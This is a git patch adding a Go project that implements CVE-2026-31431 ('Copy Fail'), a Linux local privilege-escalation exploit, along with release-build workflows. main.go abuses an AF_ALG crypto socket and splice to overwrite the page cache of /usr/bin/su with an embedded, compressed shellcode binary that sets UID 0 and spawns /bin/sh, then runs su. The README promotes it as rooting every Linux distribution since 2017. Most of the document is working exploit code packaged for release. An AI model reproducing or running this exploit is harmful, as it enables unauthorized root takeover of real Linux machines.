From eaa1e40d1fbc5e815eedd2b2ff186d2567e44710 Mon Sep 17 00:00:00 2001
From: kernel-sanders <1490292+kernel-sanders@users.noreply.github.com>
Date: Wed, 29 Apr 2026 18:52:03 -0400
Subject: [PATCH] =?UTF-8?q?feat:=20=E2=9C=A8=20initial=20commit?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: kernel-sanders <1490292+kernel-sanders@users.noreply.github.com>
---
 .github/workflows/release.yml |  31 +++++
 .gitignore                    |   2 +
 .goreleaser.yaml              |  30 +++++
 LICENSE                       |   8 ++
 README.md                     |   7 ++
 go.mod                        |   5 +
 go.sum                        |   2 +
 main.go                       | 207 ++++++++++++++++++++++++++++++++++
 8 files changed, 292 insertions(+)
 create mode 100644 .github/workflows/release.yml
 create mode 100644 .gitignore
 create mode 100644 .goreleaser.yaml
 create mode 100644 LICENSE
 create mode 100644 README.md
 create mode 100644 go.mod
 create mode 100644 go.sum
 create mode 100644 main.go

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
new file mode 100644
index 0000000..8ede042
--- /dev/null
+++ b/.github/workflows/release.yml
@@ -0,0 +1,31 @@
+name: goreleaser
+
+on:
+  pull_request:
+  push:
+    tags:
+      - "*"
+
+permissions:
+  contents: write
+
+jobs:
+  goreleaser:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+        with:
+          fetch-depth: 0
+      - name: Set up Go
+        uses: actions/setup-go@v5
+        with:
+          go-version: stable
+      - name: Run GoReleaser
+        uses: goreleaser/goreleaser-action@v6
+        with:
+          distribution: goreleaser
+          version: "~> v2"
+          args: release --clean
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..f3d638d
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+copyfail
+.ansible
\ No newline at end of file
diff --git a/.goreleaser.yaml b/.goreleaser.yaml
new file mode 100644
index 0000000..8ea776c
--- /dev/null
+++ b/.goreleaser.yaml
@@ -0,0 +1,30 @@
+version: 2
+
+before:
+  hooks:
+    - go mod tidy
+
+
+builds:
+  - env:
+      - CGO_ENABLED=0
+    goos:
+      - linux
+
+archives:
+  - format: tar.gz
+    # this name template makes the OS and Arch compatible with the results of `uname`.
+    name_template: >-
+      {{ .ProjectName }}_
+      {{- title .Os }}_
+      {{- if eq .Arch "amd64" }}x86_64
+      {{- else if eq .Arch "386" }}i386
+      {{- else }}{{ .Arch }}{{ end }}
+      {{- if .Arm }}v{{ .Arm }}{{ end }}
+
+changelog:
+  sort: asc
+  filters:
+    exclude:
+      - "^docs:"
+      - "^test:"
\ No newline at end of file
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..dbdfd91
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,8 @@
+Copyright 2026 Bad Sector Labs
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..15f7af4
--- /dev/null
+++ b/README.md
@@ -0,0 +1,7 @@
+# CopyFail Go
+
+> Most Linux LPEs need a race window or a kernel-specific offset.Copy Fail is a straight-line logic flaw — it needs neither.The same ~~732-byte Python script~~ static Go binary roots every Linux distribution shipped since 2017.
+
+A Go implementation of CVE-2026-31431. In case you need a static binary and no Python dependency.
+
+See [copy.fail](https://copy.fail) for more info.
\ No newline at end of file
diff --git a/go.mod b/go.mod
new file mode 100644
index 0000000..0b2f1cd
--- /dev/null
+++ b/go.mod
@@ -0,0 +1,5 @@
+module copyfail
+
+go 1.26.2
+
+require golang.org/x/sys v0.43.0
diff --git a/go.sum b/go.sum
new file mode 100644
index 0000000..71016e3
--- /dev/null
+++ b/go.sum
@@ -0,0 +1,2 @@
+golang.org/x/sys v0.43.0 h1:Rlag2XtaFTxp19wS8MXlJwTvoh8ArU6ezoyFsMyCTNI=
+golang.org/x/sys v0.43.0/go.mod h1:4GL1E5IUh+htKOUEOaiffhrAeqysfVGipDYzABqnCmw=
diff --git a/main.go b/main.go
new file mode 100644
index 0000000..01e5af0
--- /dev/null
+++ b/main.go
@@ -0,0 +1,207 @@
+//go:build linux
+// +build linux
+
+package main
+
+import (
+	"bytes"
+	"compress/zlib"
+	"encoding/hex"
+	"fmt"
+	"io"
+	"log"
+	"os"
+	"os/exec"
+	"strings"
+	"unsafe"
+
+	"golang.org/x/sys/unix"
+)
+
+const (
+	// Cryptographic API Socket Constants
+	SOL_ALG               = 279
+	ALG_SET_KEY           = 1
+	ALG_SET_IV            = 2
+	ALG_SET_OP            = 3
+	ALG_SET_AEAD_ASSOCLEN = 4
+	ALG_SET_AEAD_AUTHSIZE = 5
+)
+
+// packCmsg constructs a raw Control Message (CMSG) buffer to be sent alongside the payload
+func packCmsg(level, typ int, data []byte) []byte {
+	cmsgSpace := unix.CmsgSpace(len(data))
+	b := make([]byte, cmsgSpace)
+	h := (*unix.Cmsghdr)(unsafe.Pointer(&b[0]))
+	h.Level = int32(level)
+	h.Type = int32(typ)
+	h.SetLen(unix.CmsgLen(len(data)))
+	copy(b[unix.CmsgLen(0):], data)
+	return b
+}
+
+// c is the core vulnerability trigger function, replacing 4 bytes of the target file's page cache
+func c(f *os.File, t int, cData []byte) {
+	// 1. Create AF_ALG cryptographic socket
+	fd, err := unix.Socket(unix.AF_ALG, unix.SOCK_SEQPACKET, 0)
+	if err != nil {
+		log.Fatalf("Socket creation failed: %v", err)
+	}
+	defer unix.Close(fd)
+
+	// 2. Bind it to the vulnerable Authenticated Encryption wrapper
+	sa := &unix.SockaddrALG{
+		Type: "aead",
+		Name: "authencesn(hmac(sha256),cbc(aes))",
+	}
+	if err := unix.Bind(fd, sa); err != nil {
+		log.Fatalf("Socket Bind failed: %v", err)
+	}
+
+	// 3. Setup dummy key and auth sizes
+	keyHex := "0800010000000010" + strings.Repeat("0", 64)
+	keyBytes, _ := hex.DecodeString(keyHex)
+
+	if err := unix.SetsockoptString(fd, SOL_ALG, ALG_SET_KEY, string(keyBytes)); err != nil {
+		log.Fatalf("Setsockopt(key) failed: %v", err)
+	}
+	if err := unix.SetsockoptInt(fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, 4); err != nil {
+		log.Fatalf("Setsockopt(authsize) failed: %v", err)
+	}
+
+	// 4. Accept a new operational socket connection.
+	// AF_ALG requires accept(2) with NULL addr/addrlen; unix.Accept passes
+	// non-NULL pointers and the kernel returns ECONNABORTED. See SockaddrALG
+	// docs in golang.org/x/sys/unix.
+	uFdRaw, _, errno := unix.Syscall6(unix.SYS_ACCEPT4, uintptr(fd), 0, 0, 0, 0, 0)
+	if errno != 0 {
+		log.Fatalf("Accept failed: %v", errno)
+	}
+	uFd := int(uFdRaw)
+	defer unix.Close(uFd)
+
+	// 5. Build Control Messages (CMSG)
+	var oob []byte
+	oob = append(oob, packCmsg(SOL_ALG, ALG_SET_OP, []byte{0, 0, 0, 0})...)                        // ALG_SET_OP (Decrypt)
+	oob = append(oob, packCmsg(SOL_ALG, ALG_SET_IV, append([]byte{0x10}, make([]byte, 19)...))...) // ALG_SET_IV (20 bytes)
+	oob = append(oob, packCmsg(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, []byte{8, 0, 0, 0})...)             // ALG_SET_AEAD_ASSOCLEN
+
+	// 6. Send payload payload out-of-band configuring encryption state
+	msgData := append([]byte("AAAA"), cData...)
+	err = unix.Sendmsg(uFd, msgData, oob, nil, unix.MSG_MORE)
+	if err != nil {
+		log.Fatalf("Sendmsg failed: %v", err)
+	}
+
+	// 7. Setup standard pipes for the splice
+	var p [2]int
+	if err := unix.Pipe(p[:]); err != nil {
+		log.Fatalf("Pipe creation failed: %v", err)
+	}
+	defer unix.Close(p[0])
+	defer unix.Close(p[1])
+
+	// 8. Splice magic (Moves read-only page cache refs into the pipe -> then to the crypto socket)
+	o := t + 4
+	offset := int64(0)
+
+	// Splice from the target file into the pipe
+	_, err = unix.Splice(int(f.Fd()), &offset, p[1], nil, o, 0)
+	if err != nil {
+		log.Fatalf("Splice (File->Pipe) failed: %v", err)
+	}
+
+	// Splice from the pipe into the active crypto socket
+	_, err = unix.Splice(p[0], nil, uFd, nil, o, 0)
+	if err != nil {
+		log.Fatalf("Splice (Pipe->Socket) failed: %v", err)
+	}
+
+	// 9. Consume response, triggering the memory-overwrite condition
+	buf := make([]byte, 8+t)
+	unix.Read(uFd, buf)
+}
+
+func decompressPayload(zlibBytes []byte) []byte {
+	r, err := zlib.NewReader(bytes.NewReader(zlibBytes))
+	if err != nil {
+		log.Fatalf("Zlib decompression failed: %v", err)
+	}
+	payload, err := io.ReadAll(r)
+	r.Close()
+	if err != nil {
+		log.Fatalf("Read zlib payload: %v", err)
+	}
+	return payload
+}
+
+func printHelp() {
+	prog := os.Args[0]
+	fmt.Fprintf(os.Stderr, "Usage: %s [-h|--help]\n\n", prog)
+	fmt.Fprintf(os.Stderr, "Go implementation of CVE-2026-31431 (copy-fail).\n")
+	fmt.Fprintf(os.Stderr, "Overwrites page cache of /usr/bin/su and runs su.\n")
+	fmt.Fprintf(os.Stderr, "See https://copy.fail for for information.\n")
+}
+
+func main() {
+	for _, arg := range os.Args[1:] {
+		switch arg {
+		case "-h", "--help", "-help":
+			printHelp()
+			os.Exit(0)
+		}
+	}
+
+	var payload []byte
+
+	// Original payload from https://github.com/theori-io/copy-fail-CVE-2026-31431
+	// A 160 byte linux ELF binary that:
+	// 1. Invokes the setuid(0) system call to set the user ID to root.
+	// 2. Invokes the execve system call to execute /bin/sh.
+	// 3. Exits cleanly if the execution fails.
+	payloadHex := "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
+	payloadZlib, err := hex.DecodeString(payloadHex)
+	if err != nil {
+		log.Fatalf("Invalid hex payload: %v", err)
+	}
+	payload = decompressPayload(payloadZlib)
+
+	// Open target file in read-only mode
+	f, err := os.Open("/usr/bin/su")
+	if err != nil {
+		log.Fatalf("Failed to open target file: %v", err)
+	}
+	defer f.Close()
+
+	// Iteratively overwrite the page cache of the file, 4 bytes at a time
+	log.Printf("Overwriting page cache of %s with %d bytes", f.Name(), len(payload))
+	for i := 0; i < len(payload); i += 4 {
+		end := i + 4
+		if end > len(payload) {
+			end = len(payload)
+		}
+		c(f, i, payload[i:end])
+		if len(payload) < 10000 {
+			if i%100 == 0 {
+				log.Printf("  ... wrote %d bytes", i+4)
+			}
+		} else {
+			if i%10000 == 0 {
+				log.Printf("  ... wrote %d bytes", i+4)
+			}
+		}
+	}
+	log.Printf("  ... wrote %d bytes", len(payload))
+
+	// Execute the now-overwritten binary to trigger privilege escalation
+	log.Println("Executing payload")
+	var cmd *exec.Cmd
+	cmd = exec.Command("su")
+	cmd.Stdin = os.Stdin
+	cmd.Stdout = os.Stdout
+	cmd.Stderr = os.Stderr
+
+	if err := cmd.Run(); err != nil {
+		log.Fatalf("Failed to execute payload: %v", err)
+	}
+}